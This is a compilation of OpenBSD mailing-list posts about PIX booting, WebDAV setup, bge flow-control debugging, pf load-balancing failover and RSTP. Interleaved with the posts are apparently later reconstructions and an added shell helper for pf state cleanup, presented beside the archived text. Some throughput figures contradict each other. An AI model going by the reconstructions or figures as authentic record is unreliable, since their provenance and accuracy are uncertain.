I'm trying to use OSPFd in a 'high availability' environment, where its next-hop h/a pair (mis)use RFC3623 (Graceful OSPF Restart) to provide rapid failover between nodes. However it appears OSPFd doesn't support this? Before I dig into this, can norby/claudio/henning cast any light on the subject?

# uname -a
OpenBSD lab-netrax1.test 4.1 GENERIC#1099 sparc64

/Pete
Re: openbsd on cisco hardware?
most PIX boxes are i386 based. IIRC I've booted bsd.rd on them in the past, nothing special except flash boot.

pix515e# sh ver
...
Hardware: PIX-515E, 64 MB RAM, CPU Pentium II 433 MHz
Flash E28F128J3 @ 0xfff0, 16MB
BIOS Flash AM29F400B @ 0xfffd8000, 32KB
...
 0: Ext: Ethernet0 : address is 0012.00e1.cd67, irq 10
 1: Ext: Ethernet1 : address is 0012.00e1.cd68, irq 11
 2: Ext: Ethernet2 : address is 000e.0c59.bd1a, irq 11
...
Interface Ethernet0 "outside", is up, line protocol is up
  Hardware is i82559, BW 100 Mbps
  Auto-Duplex(Full-duplex), Auto-Speed(100 Mbps)
...

they usually even come with a (non functioning under PIXOS) USB port too.
/Pete

On 13. nov. 2006, at 04.30, Jason George wrote:
i know this is likely not possible for a number of reasons but i figured i'd ask: are there or have there been any plans to port openbsd to run on cisco hardware? googling for something like this is not very productive since the CARP vs. VRRP and firewall interoperation links dominate searches with "cisco openbsd" in them.

Older Cisco routers will typically have a Motorola 68k or some MIPS-based processor. These devices will also usually have minimal RAM (1 to 4M). Not exactly a great setup for a target platform... I seem to recall that the 030-based Mot systems may also have been lacking a proper MMU, but I could be wrong. I'm sure I'll be corrected by someone on the list. Newer gear will have a MIPS or PowerPC processor in them. x86 PIX boxes could conceivably be a target platform, but their lack of storage would require a flashboot-style installation, and thus would not be supported in an official manner, even if they were made to boot successfully. The same would go for the non-x86 modern gear. Frankly, Cisco's devices aren't even price-attractive, so as much as it would be mildly interesting to run OpenBSD on some PIX 515 boxes, it's a waste of time and money.
--Jason
Re: openbsd on cisco hardware?
Apples & oranges I believe, this *might* be why:

[EMAIL PROTECTED] ~/Desktop> file pix706.bin bsd.rd floppy40.fs
pix706.bin:  x86 boot sector
bsd.rd:      ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
floppy40.fs: x86 boot sector

/Pete

On 13. nov. 2006, at 16.06, Jason George wrote:
most PIX boxes are i386 based. IIRC I've booted bsd.rd on them in the past, nothing special except flash boot.

pix515e# sh ver
...
Hardware: PIX-515E, 64 MB RAM, CPU Pentium II 433 MHz
Flash E28F128J3 @ 0xfff0, 16MB
BIOS Flash AM29F400B @ 0xfffd8000, 32KB
...
 0: Ext: Ethernet0 : address is 0012.00e1.cd67, irq 10
 1: Ext: Ethernet1 : address is 0012.00e1.cd68, irq 11
 2: Ext: Ethernet2 : address is 000e.0c59.bd1a, irq 11
...
Interface Ethernet0 "outside", is up, line protocol is up
  Hardware is i82559, BW 100 Mbps
  Auto-Duplex(Full-duplex), Auto-Speed(100 Mbps)
...
they usually even come with a (non functioning under PIXOS) USB port too.

I grabbed an old PIX 501 off the shelf... no such luck booting a standard i386 ramdisk image.

CISCO SYSTEMS PIX-501
Embedded BIOS Version 4.3.200 07/31/01 15:58:22.08
Compiled by morlee
16 MB RAM

PCI Device Table.
Bus Dev Func VendID DevID Class        Irq
 00  00  00   1022  3000  Host Bridge
 00  11  00   8086  1209  Ethernet      9
 00  12  00   8086  1209  Ethernet     10

Cisco Secure PIX Firewall BIOS (4.2) #6: Mon Aug 27 15:09:54 PDT 2001
Platform PIX-501
Flash=E28F640J3 @ 0x300

Use BREAK or ESC to interrupt flash boot.
Use SPACE to begin flash boot immediately.
Flash boot interrupted.
0: i8255X @ PCI(bus:0 dev:17 irq:9 )
1: i8255X @ PCI(bus:0 dev:18 irq:10)

Using 1: i82557 @ PCI(bus:0 dev:18 irq:10), MAC: 0011.935f.08c6
Use ? for help.
monitor> addr 192.168.4.234
address 192.168.4.234
monitor> server 192.168.4.3
server 192.168.4.3
monitor> file bsd.rd
file bsd.rd
monitor> ping 192.168.4.3
Sending 5, 100-byte 0xc3f8 ICMP Echoes to 192.168.4.3, timeout is 4 seconds:
!
Success rate is 100 percent (5/5)
monitor> tftp
tftp [EMAIL PROTECTED]
[snip]
Received 4938658 bytes
Bad magic number (0xab00450)
monitor>
Re: WebDAV
Hi,
I've used it problem free with osx & windows clients; it should probably be available only over https:

    # The archive stripped the angle-bracket container lines from this config;
    # the <VirtualHost>, <Directory> and <Limit> directives are restored here,
    # but the body of the <Limit LOCK UNLOCK> block was lost.
    <VirtualHost _default_:443>
    DocumentRoot "/var/www/secure_content"
    ServerName whatever.com
    ServerAlias www.whatever.com
    ServerAdmin [EMAIL PROTECTED]
    ErrorLog logs/error_log
    TransferLog logs/access_log

    <Directory "/var/www/secure_content">
        DAV On
        AuthType Basic
        AuthName "whatever.com network disk"
        AuthUserFile /var/www/conf/passwd
        AllowOverride None
        Require valid-user
        Options None
        <Limit LOCK UNLOCK>
            # contents lost in the archive
        </Limit>
    </Directory>

    DAVLockDB /dav_scratch/DAVLock
    DAVMinTimeout 600

    SSLEngine on
    SSLCertificateFile    /etc/ssl/server.crt
    SSLCertificateKeyFile /etc/ssl/private/server.key
    CustomLog logs/ssl_request_log \
        "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
    </VirtualHost>

/Pete

On 1. des. 2006, at 22.00, Gaby Vanhegan wrote:
Hi,
Although the mail archives have little on the topic, as does google, are there any major security concerns I should be aware of when installing mod_dav under the stock OpenBSD apache1.3, with apache chrooted?
Gaby
--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/sudoku/
http://weblog.vanhegan.net/
Performance problems with bge under OpenBSD4.0/i386
Hi,

I'm trying to track down the cause of poor network performance under OpenBSD 4.0/i386 on HP ProLiants (DL380-G4 and DL360-G4p), which seems to concern Ethernet 802.3x flow control on the bge NICs.

Test topology is:

    HP DL380-G4
      int bge0 (BCM5704C auto at 1000baseT full-duplex)
         |
         |
      int Gig 13/6 (auto at 1000baseT full-duplex)
    Cisco 6513 chassis + WS-X6548-GE-TX + WS-X6748-GE-TX
      int Gig 12/47 (auto at 1000baseT full-duplex)
         |
         |
      int bge0 (BCM5704C auto at 1000baseT full-duplex)
    HP DL360-G4p

Test traffic is generated with:

    On Source: dd if=/dev/zero bs=1k count=1 | nc _peer_ 1234
    On Sink:   nc -l 1234 > /dev/null

With the 4.0-release kernel (GENERIC#1107), the bge driver does not negotiate flow control with the switch:

    switch# show interfaces flowcontrol | inc Port|admin|Gi12/47|Gi13/6
    Port       Send FlowControl  Receive FlowControl  RxPause TxPause
               admin    oper     admin    oper
    Gi12/47    desired  off      desired  off         0       0
    Gi13/6     desired  off      desired  off         0       0

Network traffic is very slow and the receiving host reports significant 'Input errors' on the NIC interface after the transfer:

    source~> netstat -i -I bge0 | grep -e Name -e Link
    Name  Mtu   Network  Address            Ipkts  Ierrs  Opkts  Oerrs  Colls
    bge0  1500           00:18:fe:32:2e:4a   1050      0   1276      0      0
    source~> dd if=/dev/zero bs=1k count=10 | nc _peer_ 1234
    10+0 records in
    10+0 records out
    10240 bytes transferred in 13.219 secs (7746244 bytes/sec)
    source~> netstat -i -I bge0 | grep -e Name -e Link
    Name  Mtu   Network  Address            Ipkts  Ierrs  Opkts  Oerrs  Colls
    bge0  1500           00:18:fe:32:2e:4a  52684      0  73166      0      0

    sink~> netstat -i -I bge0 | grep -e Name -e Link
    Name  Mtu   Network  Address            Ipkts  Ierrs  Opkts  Oerrs  Colls
    bge0  1500           00:17:a4:45:f5:25     79      0    106      0      0
    sink~> nc -l 1234 > /dev/null
    sink~> netstat -i -I bge0 | grep -e Name -e Link
    Name  Mtu   Network  Address            Ipkts  Ierrs  Opkts  Oerrs  Colls
    bge0  1500           00:17:a4:45:f5:25  70841     11  50894      0      0

With the 4.0-snapshot kernel (GENERIC#1362), the bge driver now negotiates flow control:

    switch# show interfaces flowcontrol | inc Port|admin|Gi12/47|Gi13/6
    Port       Send FlowControl  Receive FlowControl  RxPause TxPause
               admin    oper     admin    oper
    Gi12/47    desired  on       desired  on          0       0
    Gi13/6     desired  on       desired  on          0       0

However, the transfer is still very slow, and the receiving host still reports significant 'Input errors' on the NIC interface after the transfer:

    source~> netstat -i -I bge0 | grep -e Name -e Link
    Name  Mtu   Network  Address            Ipkts  Ierrs  Opkts  Oerrs  Colls
    bge0  1500           00:18:fe:32:2e:4a   1459      0   1762      0      0
    source~> dd if=/dev/zero bs=1k count=10 | nc _peer_ 1234
    10+0 records in
    10+0 records out
    10240 bytes transferred in 14.120 secs (7251650 bytes/sec)
    source~> netstat -i -I bge0 | grep -e Name -e Link
    Name  Mtu   Network  Address            Ipkts  Ierrs  Opkts  Oerrs  Colls
    bge0  1500           00:18:fe:32:2e:4a  53240      0  73457      0      0

    sink~> netstat -i -I bge0 | grep -e Name -e Link
    Name  Mtu   Network  Address            Ipkts  Ierrs  Opkts  Oerrs  Colls
    bge0  1500           00:17:a4:45:f5:25     89      0     98      0      0
    sink~> nc -l 1234 > /dev/null
    sink~> netstat -i -I bge0 | grep -e Name -e Link
    Name  Mtu   Network  Address            Ipkts  Ierrs  Opkts  Oerrs  Colls
    bge0  1500           00:17:a4:45:f5:25  70849      9  51186      0      0

To summarise, it seems as though flow control is negotiated for both TX & RX in the recent bge driver, but is only functional for TX (if at all).

The only relevant source change I can find is:

http://www.openbsd.org/cgi-bin/cvsweb/src/sys/dev/pci/if_bge.c.diff?r1=1.202&r2=1.203&f=h

"Flow control support for bge(4)/brgphy(4). From brad@ based on code from NetBSD", which includes the comment:

    /* We can do both TXPAUSE and RXPAUSE. */

Setting 'ifconfig bge0 debug' provides no additional output.

I have also repeated the tests with several different servers, NICs (all bge), cables and switches to rule out faulty devices.

Has anyone any ideas on fixes for this, or how to debug the issue further?

Dmesg below.

/Pete

    # dmesg
    OpenBSD 4.0-current (GENERIC) #1362: Fri Feb 9 14:26:43 MST 2007
        [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
    cpu0: Intel(R) Xeon(TM) CPU 3.40GHz ("GenuineIntel" 686-class) 3.41 GHz
    cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,H
Re: Performance problems with bge under OpenBSD4.0/i386
Very interesting. On the switch I can set the port flow-control to on, off or desirable. The following is the blurb on those configuration options:

Gigabit Ethernet Flow Control Keyword Functions

    receive on:       The port uses flow control dictated by the neighbor port.
    receive desired:  The port uses flow control if the neighbor port uses it, and does not use
                      flow control if the neighbor port does not use it.
    receive off:      The port does not use flow control, regardless of whether flow control is
                      requested by the neighbor port.
    send on:          The port sends flow-control frames to the neighbor port.
    send desired:     The port sends flow-control frames to the neighbor port if the neighbor
                      port asks to use flow control.
    send off:         The port does not send flow-control frames to the neighbor port.

However, irrespective of what I configure the port flow-control to on the switch (and then reboot the OpenBSD host, to be sure of correct interface initialisation), I cannot get ifconfig to report {tx|rx}pause. Is this likely to be a driver problem, or is there some broken flash code on the bge NIC (which I could possibly update)?

/Pete

On 14. feb. 2007, at 22.42, Mark Kettenis wrote:

From: Pete Vickers <[EMAIL PROTECTED]>
Date: Wed, 14 Feb 2007 13:33:25 +0100

    # ifconfig bge0
    bge0: flags=8843 mtu 1500
            lladdr 00:17:a4:45:f5:25
            groups: egress
            media: Ethernet autoselect (1000baseT full-duplex)
            status: active
            inet6 fe80::217:a4ff:fe45:f525%bge0 prefixlen 64 scopeid 0x1
            inet x.x.x.x netmask 0xff00 broadcast x.x.x.x

This suggests flow control has *not* been negotiated. With msk(4), I get:

    borodin$ ifconfig msk0
    msk0: flags=8843 mtu 1500
            lladdr 00:16:cb:a2:87:67
            groups: egress
            media: Ethernet autoselect (1000baseT full-duplex,rxpause,txpause)
            status: active
            inet6 fe80::216:cbff:fea2:8767%msk0 prefixlen 64 scopeid 0x1
            inet 192.168.0.17 netmask 0xff00 broadcast 192.168.0.255
Re: FTP-Proxy
On 20. sep. 2006, at 10.22, Alan Smith wrote:

> or a machine with dual nics - one inside and one outside the firewall.

Rod Dorman wrote:
This is effectively getting rid of the PIX!

If it's got both an inside and outside interface it can be configured as a gateway such that any inside host can get outside completely bypassing the PIX. Are you sure your network admins are OK with that?

Ok - never write technical mails after 14 hours on a plane - they make no sense!!! In a nutshell, I need to know if I can use ftp-proxy on a machine inside our current PIX firewall. If it will only run on a machine running PF acting as the main firewall/gateway then I'm out of luck. I will not be using it if the only way would be a NIC inside and outside of the firewall. Sorry for the confusion (and thanks for the reply Rod)

Alan

Hi,

A few thoughts for you to explore:

1. A good number of web browsers etc. support authenticated ftp 'upload' via a proxy (e.g. squid), thus fixing your problem - googling will direct you on this...

2. If you can put an OpenBSD box on the inside of the PIX, and make the client traffic go via it (e.g. as their default gateway), then you can use ftp-proxy.

3. Recent PIXen support the WCCP2 protocol, as does squid (I believe it's basically just a GRE tunnel), so maybe you could run squid on OpenBSD to direct traffic appropriately, once redirected from the PIX.

Food for thought anyway

/Pete
rndc/named automatic key generation
Following OpenBSD's automatic generation of ssh and isakmp keys, perhaps the following would be a worthwhile addition to /etc/rc to generate a key/config for rndc/named.

==
    if [ ! -f /etc/rndc.conf ]; then
        echo -n "rndc-confgen: generating new RNDC key... "
        # rndc-confgen writes rndc.conf to stdout followed by a commented-out
        # named.conf fragment; tee keeps the whole output as /etc/rndc.conf
        # while grep appends only the fragment lines (dropping the
        # "# Start", "# End" and "# Use" marker lines) to named.conf.
        if /usr/sbin/rndc-confgen | tee /etc/rndc.conf \
            | grep '^# [^SEU]' >> /var/named/etc/named.conf; then
            # the files written above are /etc/rndc.conf and named.conf
            chown root:named /etc/rndc.conf /var/named/etc/named.conf
            chmod 640 /etc/rndc.conf /var/named/etc/named.conf
            echo done.
        else
            echo failed.
        fi
    fi
==

Notes:

1. I stopped short of piping through a "sed 's/^#//'" so that it still remains disabled by default.

2. I guess there is a better way than the late chown/chmod calls, but I guess it's ok, since we are still pre-login during rc.

/Pete
Re: rndc/named automatic key generation
On 28. sep. 2006, at 02.30, Spruell, Darren-Perot wrote:

From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
> Following OpenBSD's automatic generation of ssh and isakmp keys, perhaps the following would be a worthwhile addition to /etc/rc to generate a key/config for rndc/named.

/etc/rc already handles that during named startup.

DS

Ahh, yep, should have read through the rest of /etc/rc before posting...

While I'm there though, is there any reason (other than historical) for the following two anomalies:

- the installer script turns sshd on in /etc/rc.conf rather than /etc/rc.conf.local
- the installer script's line for ntpd in /etc/rc.conf.local doesn't use "" like all the examples in /etc/rc

If it's just a matter of diffs, I'm more than willing to try and submit them...

/Pete
bge problems on HP DL360 G4p with -current
Hi,

I'm running a recent OpenBSD/i386 snapshot on a few 'HP DL360 G4p's; all seems good apart from the first NIC (bge0), which will not see the LAN.

An 'ifconfig bge0' output cycles between "media: Ethernet autoselect (none)" and "media: Ethernet autoselect (loopback)", with "status: no carrier", and will not connect to the LAN. However if I relocate the cable to bge1 then it connects perfectly and 'ifconfig bge1' shows "media: Ethernet autoselect (1000baseT full-duplex)" and "status: active".

I've tried 5 identical machines, with different switch ports and cables, and the behaviour is consistent: bge0 always fails, and bge1 always works. I've also tried moving the NICs from IRQ 7 to IRQ 5 (they are forced to use the same IRQ) in the BIOS without effect. Thus I'm pretty sure the problem is not switch, cabling or server hardware. Adding the debug flag on bge0 reveals nothing in the logs.

In the short term I can run on just bge1, but I'm hoping to do NIC/switch redundancy via trunk(4) so I'll need bge0.

Any suggestions gratefully received. Full dmesg below.

thanks,
/Pete

    [EMAIL PROTECTED] ~>cat /var/run/dmesg.boot
    OpenBSD 4.0-current (GENERIC) #1134: Mon Oct 2 19:44:53 MDT 2006
        [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
    cpu0: Intel(R) Xeon(TM) CPU 3.40GHz ("GenuineIntel" 686-class) 3.41 GHz
    cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,DS-CPL,EST,CNXT-ID,CX16
    cpu0: EST: strange msr value 0x112d112d
    real mem = 2147000320 (2096680K)
    avail mem = 1950441472 (1904728K)
    using 4256 buffers containing 107454464 bytes (104936K) of memory
    mainbus0 (root)
    bios0 at mainbus0: AT/286+(00) BIOS, date 12/31/99, BIOS32 rev. 0 @ 0xf, SMBIOS rev. 2.3 @ 0xec000 (73 entries)
    bios0: HP ProLiant DL360 G4p
    pcibios0 at bios0: rev 2.1 @ 0xf/0x2000
    pcibios0: PCI BIOS has 7 Interrupt Routing table entries
    pcibios0: PCI Interrupt Router at 000:31:0 ("Intel 6300ESB LPC" rev 0x00)
    pcibios0: PCI bus #13 is the last bus
    bios0: ROM list: 0xc/0x8000 0xc8000/0x4000! 0xee000/0x2000!
    cpu0 at mainbus0
    pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
    pchb0 at pci0 dev 0 function 0 "Intel E7520 MCH" rev 0x0c
    ppb0 at pci0 dev 2 function 0 "Intel MCH PCIE" rev 0x0c
    pci1 at ppb0 bus 13
    ppb1 at pci0 dev 4 function 0 "Intel MCH PCIE" rev 0x0c
    pci2 at ppb1 bus 6
    ppb2 at pci2 dev 0 function 0 "Intel PCIE-PCIE" rev 0x09
    pci3 at ppb2 bus 7
    ppb3 at pci2 dev 0 function 2 "Intel PCIE-PCIE" rev 0x09
    pci4 at ppb3 bus 10
    ppb4 at pci0 dev 6 function 0 "Intel MCH PCIE" rev 0x0c
    pci5 at ppb4 bus 3
    ppb5 at pci0 dev 28 function 0 "Intel 6300ESB PCIX" rev 0x02
    pci6 at ppb5 bus 2
    ciss0 at pci6 dev 1 function 0 "Compaq Smart Array 64xx" rev 0x01: irq 7
    ciss0: 1 LD, HW rev 1, FW 2.68/2.68
    scsibus0 at ciss0: 1 targets
    sd0 at scsibus0 targ 0 lun 0: SCSI0 0/direct fixed
    sd0: 140006MB, 140006 cyl, 64 head, 32 sec, 512 bytes/sec, 286734240 sec total
    bge0 at pci6 dev 2 function 0 "Broadcom BCM5704C" rev 0x10, BCM5704 B0 (0x2100): irq 7, address 00:18:fe:32:1e:08
    brgphy0 at bge0 phy 1: BCM5704 10/100/1000baseT PHY, rev. 0
    bge1 at pci6 dev 2 function 1 "Broadcom BCM5704C" rev 0x10, BCM5704 B0 (0x2100): irq 7, address 00:18:fe:32:1e:07
    brgphy1 at bge1 phy 1: BCM5704 10/100/1000baseT PHY, rev. 0
    uhci0 at pci0 dev 29 function 0 "Intel 6300ESB USB" rev 0x02: irq 5
    usb0 at uhci0: USB revision 1.0
    uhub0 at usb0
    uhub0: Intel UHCI root hub, rev 1.00/1.00, addr 1
    uhub0: 2 ports with 2 removable, self powered
    uhci1 at pci0 dev 29 function 1 "Intel 6300ESB USB" rev 0x02: irq 5
    usb1 at uhci1: USB revision 1.0
    uhub1 at usb1
    uhub1: Intel UHCI root hub, rev 1.00/1.00, addr 1
    uhub1: 2 ports with 2 removable, self powered
    "Intel 6300ESB WDT" rev 0x02 at pci0 dev 29 function 4 not configured
    "Intel 6300ESB APIC" rev 0x02 at pci0 dev 29 function 5 not configured
    ehci0 at pci0 dev 29 function 7 "Intel 6300ESB USB" rev 0x02: irq 7
    usb2 at ehci0: USB revision 2.0
    uhub2 at usb2
    uhub2: Intel EHCI root hub, rev 2.00/1.00, addr 1
    uhub2: 4 ports with 4 removable, self powered
    ppb6 at pci0 dev 30 function 0 "Intel 82801BA AGP" rev 0x0a
    pci7 at ppb6 bus 1
    vga1 at pci7 dev 3 function 0 "ATI Rage XL" rev 0x27
    wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
    wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
    "Compaq iLO" rev 0x01 at pci7 dev 4 function 0 not configured
    "Compaq iLO" rev 0x01 at pci7 dev 4 function 2 not configured
    ichpcib0 at pci0 dev 31 function 0 "Intel 6300ESB LPC" rev 0x02
    pciide0 at pci0 dev 31 function 1 "Intel 6300ESB IDE" rev 0x02: DMA, channel 0 configured t
Re: pf load balancing and failover
Hi,

If I recall correctly, slbd adds new rules to pf for each incoming tcp session. Since I couldn't get it to work (old version) I do not know what the session and Sources tables will look like, but I suspect there will be no problems with them in slbd. Client-server association is maintained by slbd and implemented with separate rules for each tcp session. This seems a bit ineffective and rather pointless since pf has the load balancing functionality built in.

The problems with using pf and a health checking script are related to removal of failed backends. There are two separate issues:

1) When using sticky-address in the rdr rules, client-server associations are added to the internal Sources table. It is impossible to remove entries for a single backend from this table. If a backend fails and is removed from the rdr destination table, this table will have to be flushed, making all clients end up on new backends, which is unacceptable in many configurations. If this table is not cleared then the rdr destination table is not inspected for client IPs found in the Sources table. These clients will still be sent to the failed and removed backend. Preferably entries could be removed from this table based on source-IP and backend-IP:backend-port, and maybe even the virtual service IP:port or a pf rule number.

2) TCP sessions to a failed backend will continue to exist after the backend is removed from the rdr destination table. As of today these sessions can be removed with pfctl by specifying the source and destination IP addresses. Since different services can run on different port numbers on the same machines it should be possible to specify a destination port number as well. I guess that if a backend dies then the client is notified about this just as if it had been speaking directly to the backend, so it might not be necessary to clean out these sessions at all, and maybe even the tcpdrop tool will do the trick?

Anyway, the main issue is with removing single sessions from the internal Sources table (as it is called in pfctl(8)).

/Pete

On 22. okt. 2006, at 21.13, Kevin Reay wrote:

On 10/22/06, Per-Olov Sjvholm <[EMAIL PROTECTED]> wrote:

Hi again

I am looking at the CVS. I can't see that it's possible to remove addresses out of the box from a round robin scheme in PF against a faulty web server. Am I missing something? But maybe I misunderstood Kevin Reay, who in this thread said: "and it would automatically remove the address from a pf poll (and optionality run a command) when a host failed.". Maybe I have to do some scripting after all...

It can be a little confusing at first, but it makes a lot of sense once you understand it. The way I remember it, a person creates a config file for slbd that defines the various pools and their polling methods, and slbd creates the load balancing pools in pf at start-up automatically (in an anchored ruleset). Then it removes entries from those pools when a server goes down. So... no scripting required. Of course, Bill Marquette will probably have more knowledge/details about this than me...

Kevin
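The two clean-up problems Pete lists (states and sticky Sources entries that still point at a dead backend) in a runnable shell helper; this is an added example, not code from the thread or from slbd. It assumes the OpenBSD 4.x pfctl output layouts given in the comments (inbound rdr states as "iface tcp backend:port (virtual:port) <- client:port state", source-tracking entries as "client -> backend ( ... )"), works on constructed samples, and only prints the pfctl -k commands rather than running them.

```shell
#!/bin/sh
# Added example (not from the thread): find the pf states and the sticky
# source-tracking entries that still point at a backend a health check has
# declared dead, and print the pfctl -k commands that would remove the states.
#
# Assumed (not verified against a live box) pfctl output layouts:
#   pfctl -ss :  <iface> tcp <backend:port> (<virtual:port>) <- <client:port> <state>
#   pfctl -sS :  <client> -> <backend> ( states N, connections N, rate R )

# Constructed sample of "pfctl -ss": two backends behind the virtual IP
# 192.0.2.1, and one client that has states to both :80 and :443 on 10.0.0.5.
SAMPLE_STATES='all tcp 10.0.0.5:80 (192.0.2.1:80) <- 203.0.113.7:51234       ESTABLISHED:ESTABLISHED
all tcp 10.0.0.6:80 (192.0.2.1:80) <- 203.0.113.9:40001       ESTABLISHED:ESTABLISHED
all tcp 10.0.0.5:443 (192.0.2.1:443) <- 203.0.113.7:51300     ESTABLISHED:ESTABLISHED
all tcp 10.0.0.5:80 (192.0.2.1:80) <- 198.51.100.4:33000      FIN_WAIT_2:FIN_WAIT_2
all tcp 10.0.0.5:80 (192.0.2.1:80) <- 203.0.113.7:51250       ESTABLISHED:ESTABLISHED'

# Constructed sample of "pfctl -sS" (sticky-address source tracking).
SAMPLE_SOURCES='203.0.113.7 -> 10.0.0.5 ( states 3, connections 0, rate 0.0/0s )
203.0.113.9 -> 10.0.0.6 ( states 1, connections 0, rate 0.0/0s )
198.51.100.4 -> 10.0.0.5 ( states 1, connections 0, rate 0.0/0s )'

# states_for_backend BACKEND PORT  < pfctl-ss-output
# Prints unique "client backend" pairs whose state terminates at BACKEND:PORT.
# Only the translated destination (field 3) is matched, so states to other
# ports on the same backend are not selected here.
states_for_backend() {
    awk -v want="$1:$2" '
        $2 == "tcp" && $3 == want && $5 == "<-" {
            split($3, dst, ":"); split($6, src, ":")
            print src[1], dst[1]
        }' | sort -u
}

# sticky_clients_for_backend BACKEND  < pfctl-sS-output
# Prints the client addresses whose sticky entry still maps to BACKEND: the
# Sources-table entries the thread says cannot be removed per backend, so a
# health check at least knows which clients will keep being sent there.
sticky_clients_for_backend() {
    awk -v want="$1" '$2 == "->" && $3 == want { print $1 }' | sort -u
}

# kill_commands_for_backend BACKEND PORT  < pfctl-ss-output
# Emits (does not run) the pfctl -k commands. pfctl -k takes only host
# addresses, so each command also drops that client's states to every other
# port on the same backend; this is exactly the limitation in point 2.
kill_commands_for_backend() {
    states_for_backend "$1" "$2" | while read -r client server; do
        printf 'pfctl -k %s -k %s\n' "$client" "$server"
    done
}

# Stand-alone demonstration on the constructed samples.
printf '%s\n' "$SAMPLE_STATES"  | kill_commands_for_backend 10.0.0.5 80
printf '%s\n' "$SAMPLE_SOURCES" | sticky_clients_for_backend 10.0.0.5
```

On a live box the samples are replaced by `pfctl -ss | states_for_backend ...` and `pfctl -sS | sticky_clients_for_backend ...`; the 203.0.113.7 kill in the demo output also removes that client's :443 state on 10.0.0.5, which is the case the thread wants a port argument for.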
Re: pf load balancing and failover
Hi Per-Olov,

If you are dealing with http based services, rather than generic tcp, then you could take a look at 'pound'. I did a port of it a while back, and use it in a pretty large scale environment here; it supports sticky backends etc. Works well for me, YMMV.

http://marc.theaimsgroup.com/?l=openbsd-ports&m=115513682623098

/Pete

On 26. okt. 2006, at 23.26, Per-Olov Sjvholm wrote:

On Thursday 26 October 2006 22:28, Kevin Reay wrote:

Hey,

On 10/26/06, Pete Vickers <[EMAIL PROTECTED]> wrote:
> If I recall correctly,

You don't. :o)

> slbd adds new rules to pf for each incoming tcp session. Since I couldn't get it to work (old version) I do not know what the session and Sources tables will look like, but I suspect there will be no problems with them in slbd. Client-server association is maintained by slbd and implemented with separate rules for each tcp session.

slbd doesn't maintain separate rules for each tcp session. Client-server association is NOT maintained by slbd.

> This seems a bit ineffective and rather pointless since pf has the load balancing functionality built in.

Which slbd relies on. slbd just inserts the load balancing rules into pf based on its own config. Then it does the job of health-checking the servers listed in its config file, and removing them from the server list if they go down.

> The problems with using pf and a health checking script are related to removal of failed backends. There are two separate issues:
>
> 1) When using sticky-address in the rdr rules, client-server associations are added to the internal Sources table. It is impossible to remove entries for a single backend from this table. If a backend fails and is removed from the rdr destination table, this table will have to be flushed, making all clients end up on new backends, which is unacceptable in many configurations. If this table is not cleared then the rdr destination table is not inspected for client IPs found in the Sources table. These clients will still be sent to the failed and removed backend. Preferably entries could be removed from this table based on source-IP and backend-IP:backend-port, and maybe even the virtual service IP:port or a pf rule number.

Which is what slbd avoids. slbd doesn't use sticky-address for this reason. slbd seems mostly geared for web servers where the web application is written well enough to not need each request to go back to the same server.

Kevin

Hi Kevin

I can come up with 100 reasons for using the same web target server over a whole session and very few for not doing it. I can't see that we can use slbd for the ordering system as intended if requests go to just any server in the pool. Or did I miss anything?

Regards
/Per-Olov
Re: pf load balancing and failover
Hi Berk,

I'm really interested in this. I have a load of legacy tcp session based load balancing which I'd love to migrate to an OpenBSD/pf based solution. Do you have a patch which applies cleanly to 4.0?

/Pete

On 26. okt. 2006, at 22.16, Berk D. Demir wrote:

Pete Vickers wrote:
> 1) When using sticky-address in the rdr rules, client-server associations are added to the internal Sources table. It is impossible to remove entries for a single backend from this table. If a backend fails and is removed from the rdr destination table, this table will have to be flushed, making all clients end up on new backends, which is unacceptable in many configurations. If this table is not cleared then the rdr destination table is not inspected for client IPs found in the Sources table. These clients will still be sent to the failed and removed backend. Preferably entries could be removed from this table based on source-IP and backend-IP:backend-port, and maybe even the virtual service IP:port or a pf rule number.
>
> 2) TCP sessions to a failed backend will continue to exist after the backend is removed from the rdr destination table. As of today these sessions can be removed with pfctl by specifying the source and destination IP addresses. Since different services can run on different port numbers on the same machines it should be possible to specify a destination port number as well. I guess that if a backend dies then the client is notified about this just as if it had been speaking directly to the backend, so it might not be necessary to clean out these sessions at all, and maybe even the tcpdrop tool will do the trick?
>
> Anyway, the main issue is with removing single sessions from the internal Sources table (as it is called in pfctl(8)).

I've submitted a patch, adding a new ioctl to pf and an implementation to clear src-track entries likewise states (-k 1.1.1.1 -k 2.3.5.0/23). A patched build (smt. between 4.0 and -current) is running in many DCs in my county right now.

pfctl.c changed after my submission. I have to fix the patches and post here in case it helps. It needs to get OKs from developers to get into the tree. Last touch with a developer about this patch was with dhartmei on Jul 25. (I'll post it tomorrow)
Re: bridge(4) RSTP
Hi,

A nice start could be to teach our tcpdump about RSTP. At present it just pukes:

    20:30:14.196199 802.1d unknown protocol ver(0x2)

/Pete

On 27. okt. 2006, at 13.35, Stuart Henderson wrote:

FreeBSD have early support for rapid STP in bridge(4):

http://lists.freebsd.org/pipermail/freebsd-current/2006-October/066535.html
http://people.freebsd.org/~thompsa/bridge_rstp.20061012.diff

I'll try and look at it sometime, but knowing how far I got last time I tried porting any kernel code (not very... and they have made quite a few changes to bridge(4) since importing it via NetBSD last year) I thought it may be worth drawing attention to here in case anyone else is interested.
Re: bridge(4) RSTP
Hi,

Patch applies cleanly and appears to work great:

    [EMAIL PROTECTED] ~> tcpdump -i bge1 stp
    tcpdump: listening on bge1, link-type EN10MB
